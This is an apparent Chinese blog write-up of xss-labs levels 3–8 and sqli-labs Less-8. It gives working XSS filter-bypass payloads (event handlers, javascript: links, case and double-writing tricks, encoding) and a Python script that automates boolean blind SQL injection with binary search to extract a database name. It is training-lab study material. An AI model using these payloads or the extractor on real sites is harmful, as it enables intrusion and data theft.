xss-labs练习 - 技术栈

第三关

尝试输入">进行闭合操作，发现被">都被实体化了。

继续尝试输入单引号进行闭合，发现可以正常闭合value值

因为">都被实体化，所以考虑使用HTML事件进行绕过

这里使用onkeydown事件进行绕过

payload：'οnkeydοwn='alert(123)

当在输入框按下按键后即可过关

第四关

还是输入">尝试闭合，可以看到直接成功

后续和第三关同理

payload："οnclick="alert(123)

第五关

依旧先尝试闭合，可以看到，使用">即可闭合

使用与三四关相同的方法进行尝试，发现无法绕过了

观察可知，代码中将on过滤为o_n，且大小写都无法绕过

换一个方法，可以使用JavaScript的伪协议进行尝试

payload："><a href=javascript:alert(123)>

第六关

依旧先尝试闭合，可以看到，">成功闭合

尝试使用前面几关的方法，发现在使用伪协议时的href被替换为了hr_ef，尝试使用大小写绕过，发现大写后可以成功绕过

payload："><a HREF=javascript:alert(123)>

第七关

依旧先尝试闭合，使用">闭合成功

尝试使用JavaScript伪协议，发现href和script无论大小写都会被过滤

尝试将href和script都进行编码绕过，发现只有script能够被成功解码，最终绕过失败

因为他会直接将href和script替换为空，所以尝试双写绕过，发现可以成功

payload："><a hrehreff=javascrscriptipt:alert(123)>

第八关

使用">进行闭合的尝试，发现被实体化了。

但是发现它会将输入的语句直接放在<a>标签中，尝试使用JavaScript伪协议进行绕过。

使用伪协议发现script被打乱，尝试将script编码绕过

可以看到编码后的script成功绕过

payload：javascript:alert(123)

sqli第八关使用二分查找进行优化

python 复制代码

import requests

url = "http://10.100.187.164/sqli-labs-php7-master/Less-8/"
success_indicator = "You are in..........."  # 页面中的成功标识

# 使用二分查找推断数据库名的长度
def get_database_length():
    low, high = 1, 50  # 假设数据库名长度在1到50之间
    while low <= high:
        mid = (low + high) // 2
        payload_gt = f"1' AND (SELECT LENGTH(database())) > {mid} -- "
        response_gt = requests.get(url, params={"id": payload_gt})
        
        if success_indicator in response_gt.text:  # 长度大于mid
            low = mid + 1
        else:
            payload_eq = f"1' AND (SELECT LENGTH(database())) = {mid} -- "
            response_eq = requests.get(url, params={"id": payload_eq})
            if success_indicator in response_eq.text:  # 长度等于mid
                return mid
            else:  # 长度小于mid
                high = mid - 1
    return 0  # 未找到长度

# 使用二分查找推断数据库名
def get_database_name(length):
    db_name = ""
    for i in range(1, length + 1):
        low, high = 0, 127  # ASCII码范围
        char = None
        
        while low <= high:
            mid = (low + high) // 2
            payload_gt = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1))) > {mid} -- "
            response_gt = requests.get(url, params={"id": payload_gt})
            
            if success_indicator in response_gt.text:
                low = mid + 1  # 字符大于mid，调整下界
            else:
                payload_eq = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1))) = {mid} -- "
                response_eq = requests.get(url, params={"id": payload_eq})
                
                if success_indicator in response_eq.text:
                    char = chr(mid)  # 找到字符
                    break
                else:
                    high = mid - 1  # 字符小于mid，调整上界
        
        if char:
            db_name += char
        else:
            db_name += '?'  # 未识别字符占位符
            print(f"Warning: Character at position {i} not found")
    
    return db_name

# 主函数
if __name__ == "__main__":
    test_payload = "1' AND 1=1 -- "
    test_response = requests.get(url, params={"id": test_payload})
    
    length = get_database_length()
    if length > 0:
        print(f"数据库长度: {length}")
        db_name = get_database_name(length)
        print(f"数据库名称: {db_name}")
    else:
        print("无法确定数据库长度")